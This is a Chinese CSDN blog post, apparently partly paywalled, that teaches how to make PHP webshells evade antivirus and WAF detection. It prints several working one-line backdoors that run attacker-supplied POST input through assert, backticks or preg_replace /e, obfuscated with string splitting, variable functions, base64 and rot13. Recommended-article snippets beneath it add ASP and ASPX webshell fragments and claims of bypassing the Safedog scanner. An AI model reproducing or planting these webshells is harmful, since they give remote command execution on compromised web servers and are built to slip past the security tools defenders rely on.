shell 免杀aspx_免杀 webshell 小叙 [ 一 ]

最新推荐文章于 2024-06-04 17:25:35 发布
最新推荐文章于 2024-06-04 17:25:35 发布
阅读量492 收藏 1
点赞数
文章标签: shell 免杀aspx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39607798/article/details/112889956
版权

0x01 基于各类常规命令和代码执行函数的花样变形[如,拆分重组,动态执行,以此来躲避静态特征检测],不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行[如,php7],万一再开了安全模式,就又有点儿费劲了

php中一些常见的执行类型函数:system()

exec()

shell_exec()

passthru()

proc_open()

`` 反引号执行系统命令

...<?php $_POST['fun']($_REQUEST['req']);?>

<?php   $req = "a"."s"."s"."e"."r"."t";$req($_POST["klion"]); ?>

<?php $cmd = `$_POST[ch]`;echo "

$cmd";?>

<?php $arr = array("a"=>"$_POST[fun]");$a = "${ $arr["a"]( $_POST[code])}"; ?>

<?php

$XKs1u='as';$Rqoaou='e';

$ygDOEJ=$XKs1u.'s'.$Rqoaou.'r'.'t';

$joEDdb ='b'.$XKs1u.$Rqoaou.(64).'_'.'d'.$Rqoaou.'c'.'o'.'d'.$Rqoaou;

@$ygDOEJ(@$joEDdb($_POST[nihao]));

?>

0x02 利用各类编码来消除静态特征,以此来扰乱waf识别流量,说实话这种还是相对比较容易被检测到

利用base64编码,这种编码可能是各类webshell中用的最频繁的一种,如,weevely中默认就是用的base64,所以免杀性相对较好,另外还有诸如各类免杀大马,过waf菜刀等等……<?php $a = @base64_decode($a=$_POST['fun']);$a($_POST['code']);?>

利用rot13编码,也用的比较频繁,关于各类编码的内部工作细节,请仔细阅读开发手册<?php $a=str_rot13('nffreg');$a($_POST['req']);?>

<?php   ($req = $_POST['req']) && @preg_replace('/ad/e','@'.str_rot13('nffreg').'($req)', 'add'); ?>

最低0.47元/天 解锁文章
weixin_39607798
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3508
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 627
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
默安逐日实验室:免杀研究
最新发布
moresec的博客
06-04 1138
免杀(Bypass AV, Anti-Virus Evasion)是指恶意软件通过各种手段规避杀毒软件和安全检测系统的识别和拦截,从而在目标系统中成功执行。这种技术不仅用于恶意软件的传播,也被信息安全研究人员用来测试和提升安全防护系统的能力。根据有无源码,免杀可以分为以下两种情况:​ 一般直接对二进制可执行文件进行无源码免杀技术难度较高,免杀效果也不好。于是可以通过将编译好的二进制可执行文件转化为一段shellcode,然后编写加载器执行这段shellcode,从而实现无源码免杀向有源码免杀的转化。根据
一次另类的mssql渗透之路
include_voidmain的博客
06-08 496
一次另类的mssql渗透之路
shell 免杀aspx_避开eval关键字,打造免杀一句话木
weixin_30304773的博客
01-16 1935
这年头留个php一句话木,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
php shell超强免杀、减少体积工具实现代码
10-27
不是webshell,只是个webshell免杀工具,切勿当初webshell使用,仅限免杀phpwebshell
2016最新php免杀webshell过安全狗
03-05
【2016年的测试】:描述中提到这个Webshell在2016年经过测试可以成功绕过安全狗,这可能是因为当时的安全狗检测规则相对简单,或者这个Webshell采用了当时较为新颖的免杀技术。 【文件名称列表】:只有一个名为...
shell 免杀aspx_webshell免杀套路
weixin_28767943的博客
01-30 667
0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02 目录关于eval 与 assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征PHP7.1后webshell何去何从总结0x03 关于eval 于 assert关于eval函数在php给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通...
webshell免杀小工具
wo41ge的博客
12-25 554
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句话木如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
shell 免杀aspx_记一次aspx网站渗透
weixin_42128141的博客
12-29 1552
通过前期信息搜集获取到目标站的80xx端口发现一处源码泄露查看配置文件登录manage.aspx上传shell发现安装了TeamViewer看下进程如果运行tv的话,可直接读取其远程的账号密码https://github.com/uknowsec/SharpDecryptPwdSharpDecryptPwd对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,T...
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 612
一句话木在渗透测试中最常用的就是一句话后门(小)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大。最常见的php一句话木这个一句话木由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
shell 免杀aspx_发个免杀修改的aspx提权qingshell.aspx
weixin_35795675的博客
01-30 581
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
ASPX史上最全一句话集合
2301_80115097的博客
10-18 978
/可执行命令一句话。
干货!一些webshell免杀的技巧
南迪叶先森
07-12 524
0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行 比如base32 base58
.NET 复现某项目管理系统SQL注入漏洞
ahhacker86的专栏
04-30 528
某项目工程化管理软件系统运用最前沿的信息技术,结合先进的工程项目管理理念和知识体系,具备极强的灵活性。以计划管理为核心,以合同管理为主线,全程追踪和控制项目进展,积累项目经验,帮助企业在项目进度、费用和资源投入等方面实现平衡。
【渗透实战】木免杀
logic1001的博客
05-09 983
base64 sgn编码。
免杀webshell
10-17
我理解你的问题是如何编写一个免杀webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以帮助你更好地保护你的网站和服务器。 首先,确保你的服务器和网站都有最新的安全补丁和更新。这可以帮助防止已知的漏洞被利用。 其次,使用强密码和多因素身份验证来保护你的服务器和网站。这可以防止未经授权的访问。 最后,定期审查你的服务器和网站,以查找任何异常活动或潜在的安全漏洞。如果你发现任何问题,立即采取措施来修复它们。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值